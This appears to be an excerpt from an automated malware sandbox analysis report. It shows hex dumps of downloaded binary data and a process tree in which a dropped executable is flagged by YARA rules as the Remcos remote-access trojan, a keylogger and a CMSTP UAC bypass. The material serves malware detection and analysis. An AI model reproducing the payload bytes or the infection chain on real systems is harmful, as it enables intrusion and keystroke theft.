2024-12-12 16:39:33 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 92 40 00 10 00 00 00 bc 8f 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0a 45 4d 61 74 68 45 72 72 6f 72 90 7c 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7c 92 40 00 10 00 00 00 d8 91 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0a 45 49 6e 76 61 6c 69 64 4f 70 90 d4 92 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d4 92 40 00 10 00 00 00 d8 91 40 00 00 45 40 00 0c 45 40 00 10 45 40 00 14 45 40 00 08 45 40 00 50 42 40 00 6c 42 40 00 a8 42 40 00 0b 45 5a 65 72 6f 44 69 76 69 64 65 2c 93 40 00 00 Data Ascii: $@@E@E@E@E@E@PB@lB@B@EMathError\|@\|@@E@E@E@E@E@PB@lB@B@EInvalidOp@@@E@E@E@E@E@PB@lB@B@EZeroDivide,@
2024-12-12 16:39:33 UTC	1024	IN	Data Raw: 00 00 00 8b 45 08 50 0f b7 45 e6 8b 55 f4 e8 33 f8 ff ff 59 e9 dd 02 00 00 55 e8 73 f8 ff ff 59 83 7d f4 01 75 14 8b 45 08 50 a1 a4 c6 61 00 e8 72 fb ff ff 59 e9 bc 02 00 00 8b 45 08 50 a1 a8 c6 61 00 e8 5e fb ff ff 59 e9 a8 02 00 00 55 e8 3e f8 ff ff 59 55 e8 9b f8 ff ff 59 83 7d f4 03 7e 07 c7 45 f4 03 00 00 00 8b 45 08 50 0f b7 45 e4 8b 55 f4 e8 cd f7 ff ff 59 e9 77 02 00 00 55 e8 71 f8 ff ff 59 8b 75 fc 4e ba 1c d5 40 00 b9 05 00 00 00 8b c6 e8 fb dc ff ff 85 c0 75 28 66 83 7d ea 0c 72 03 83 c6 03 8b 45 08 50 ba 02 00 00 00 8b c6 e8 29 f7 ff ff 59 83 45 fc 04 c6 45 e2 01 e9 2f 02 00 00 ba 24 d5 40 00 b9 03 00 00 00 8b c6 e8 be dc ff ff 85 c0 75 28 66 83 7d ea 0c 72 03 83 c6 02 8b 45 08 50 ba 01 00 00 00 8b c6 e8 ec f6 ff ff 59 83 45 fc 02 c6 45 e2 01 Data Ascii: EPEU3YUsY}uEParYEPa^YU>YUY}~EEPEUYwUqYuN@u(f}rEP)YEE/$@u(f}rEPYEE
2024-12-12 16:39:33 UTC	1749	IN	Data Raw: ff 75 08 92 e8 51 ff ff ff 5d c2 08 00 90 53 56 57 8b fa 8b f0 8b 1f eb 01 43 8b c6 e8 c1 7d ff ff 3b d8 7f 07 80 7c 1e ff 20 74 ed 89 1f 5f 5e 5b c3 55 8b ec 83 c4 f4 53 56 57 89 4d f8 89 55 fc 8b f8 c6 45 f7 00 8b 45 08 c6 00 00 8b 55 fc 8b c7 e8 b7 ff ff ff 8b 5d fc 8b 1b 33 f6 eb 17 8b c6 03 c0 8d 04 80 33 d2 8a 54 1f ff 66 83 ea 30 66 03 c2 8b f0 43 8b c7 e8 64 7d ff ff 3b d8 7f 11 8a 44 1f ff 04 d0 2c 0a 73 07 66 81 fe e8 03 72 cd 8b 45 fc 3b 18 7e 1d 8b c3 8b 55 fc 8b 12 2a c2 8b 55 08 88 02 8b 45 fc 89 18 8b 45 f8 66 89 30 c6 45 f7 01 8a 45 f7 5f 5e 5b 8b e5 5d c2 04 00 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f9 8b f2 89 45 fc 33 c0 55 68 25 d7 40 00 64 ff 30 64 89 20 33 db 85 ff 74 3a 8b d6 8b 45 fc e8 15 ff ff ff 8d 45 f8 50 8b c7 Data Ascii: uQ]SVWC};\| t_^[USVWMUEEU]33Tf0fCd};D,sfrE;~U*UEEf0EE_^[]@USVW3]E3Uh%@d0d 3t:EEP
2024-12-12 16:39:33 UTC	16384	IN	Data Raw: 59 f9 ff ff 84 c0 0f 84 03 01 00 00 8b d6 8a 0d 98 c6 61 00 8b c5 e8 62 fa ff ff 84 c0 74 47 8d 44 24 0c 50 8d 4c 24 0c 8b d6 8b c5 e8 2c f9 ff ff 84 c0 0f 84 d6 00 00 00 8b d6 8a 0d 8b c6 61 00 8b c5 e8 35 fa ff ff 84 c0 74 1a 8d 44 24 0c 50 8d 4c 24 0e 8b d6 8b c5 e8 ff f8 ff ff 84 c0 0f 84 a9 00 00 00 85 ff 7d 53 8b d6 8b 0d 9c c6 61 00 8b c5 e8 78 f9 ff ff 84 c0 75 12 8b d6 b9 dc dd 40 00 8b c5 e8 66 f9 ff ff 84 c0 74 04 33 ff eb 2a 8b d6 8b 0d a0 c6 61 00 8b c5 e8 4f f9 ff ff 84 c0 75 12 8b d6 b9 e8 dd 40 00 8b c5 e8 3d f9 ff ff 84 c0 74 05 bf 0c 00 00 00 85 ff 7c 24 66 83 7c 24 04 00 74 46 66 83 7c 24 04 0c 77 3e 66 83 7c 24 04 0c 75 07 66 c7 44 24 04 00 00 66 01 7c 24 04 8b d6 8b c5 e8 4b f8 ff ff 66 8b 44 24 0a 50 8b 44 24 04 50 66 8b 4c 24 10 66 Data Ascii: YabtGD$PL$,a5tD$PL$}Saxu@ft3*aOu@=t\|$f\|$tFf\|$w>f\|$ufD$f\|$KfD$PD$PfL$f
2024-12-12 16:39:33 UTC	1024	IN	Data Raw: 4d e8 b2 01 a1 2c 17 41 00 e8 eb ca ff ff e8 b6 2d ff ff e9 96 00 00 00 8d 55 e4 a1 34 ab 61 00 e8 f4 57 ff ff 8b 4d e4 b2 01 a1 cc 14 41 00 e8 c5 ca ff ff e8 90 2d ff ff eb 73 8d 55 e0 a1 9c a9 61 00 e8 d1 57 ff ff 8b 4d e0 b2 01 a1 94 17 41 00 e8 a2 ca ff ff e8 6d 2d ff ff eb 50 a1 90 b3 61 00 8b 00 89 45 c8 c6 45 cc 0b 89 5d d0 c6 45 d4 00 8d 55 c4 8b c3 e8 44 c2 ff ff 8b 45 c4 89 45 d8 c6 45 dc 0b 8d 45 c8 50 6a 02 8d 55 c0 a1 68 ad 61 00 e8 7f 57 ff ff 8b 4d c0 b2 01 a1 10 96 40 00 e8 8c ca ff ff e8 1b 2d ff ff 33 c0 5a 59 59 64 89 10 68 98 1d 41 00 8d 45 c0 ba 02 00 00 00 e8 a9 33 ff ff 8d 45 e0 ba 08 00 00 00 e8 9c 33 ff ff c3 e9 b6 2c ff ff eb de 5b 8b e5 5d c3 8d 40 00 85 c0 74 05 e8 a3 fd ff ff c3 8b c0 53 85 c0 74 2c 8b d8 81 eb 05 00 02 80 74 Data Ascii: M,A-U4aWMA-sUaWMAm-PaEE]EUDEEEEPjUhaWM@-3ZYYdhAE3E3,[]@tSt,t
2024-12-12 16:39:33 UTC	16384	IN	Data Raw: b5 8b 85 fc fc ff ff 50 e8 c0 e9 ff ff e8 d3 fc ff ff 5f 5e 5b 8b e5 5d c3 53 56 51 8b d8 66 8b 33 66 83 fe 14 73 0d 53 e8 a0 e9 ff ff e8 b3 fc ff ff eb 5b 66 81 fe 00 01 75 0f 66 c7 03 00 00 8d 43 08 e8 05 30 ff ff eb 45 66 81 fe 01 01 75 0a 8b c3 ff 15 14 c8 61 00 eb 34 66 f7 c6 00 20 74 09 8b c3 e8 34 fe ff ff eb 24 8b d4 8b c6 e8 31 69 00 00 84 c0 74 0c 8b d3 8b 04 24 8b 08 ff 51 24 eb 0b 53 e8 43 e9 ff ff e8 56 fc ff ff 5a 5e 5b c3 8b c0 66 f7 00 e8 bf 75 06 66 c7 00 00 00 c3 e8 72 ff ff ff c3 90 50 e8 e6 ff ff ff 58 c3 55 8b ec 83 c4 e8 53 56 8b 5d 0c 66 81 3b 0c 40 75 1d 8b 45 14 50 8b 45 10 50 8b 43 08 50 8b 45 08 50 e8 d9 ff ff ff 83 c4 10 e9 cc 00 00 00 83 7d 08 00 75 07 33 c0 89 45 f8 eb 0f 8d 45 e8 50 e8 cf e8 ff ff 8d 45 e8 89 45 f8 33 c0 55 Data Ascii: P_^[]SVQf3fsS[fufC0Efua4f t4$1it$Q$SCVZ^[fufrPXUSV]f;@uEPEPCPEP}u3EEPEE3U

Target ID:	0
Start time:	11:39:03
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\pPLwX9wSrD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\pPLwX9wSrD.exe"
Imagebase:	0x400000
File size:	10'485'760 bytes
MD5 hash:	1492E1506AFEDAD20933AE244CF658D1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Target ID:	3
Start time:	11:39:23
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:	0x2e0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3257754381.0000000009D60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3257338856.0000000008852000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.3256041816.00000000076B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000003.1794277108.0000000008D23000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Target ID:	4
Start time:	11:39:43
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\dzocgvabs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\dzocgvabs.exe
Imagebase:	0x400000
File size:	4'054'528 bytes
MD5 hash:	27650AFE28BA588C759ADE95BF403833
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.2056165687.0000000005A60000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000002.2057015971.000000000F520000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000004.00000000.1792904857.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000004.00000002.2056568324.000000000DC80000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Target ID:	7
Start time:	11:40:06
Start date:	12/12/2024
Path:	C:\Users\user\AppData\Local\Temp\dzocgvabs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\dzocgvabs.exe"
Imagebase:	0x400000
File size:	4'054'528 bytes
MD5 hash:	27650AFE28BA588C759ADE95BF403833
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3254290019.0000000009D3A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false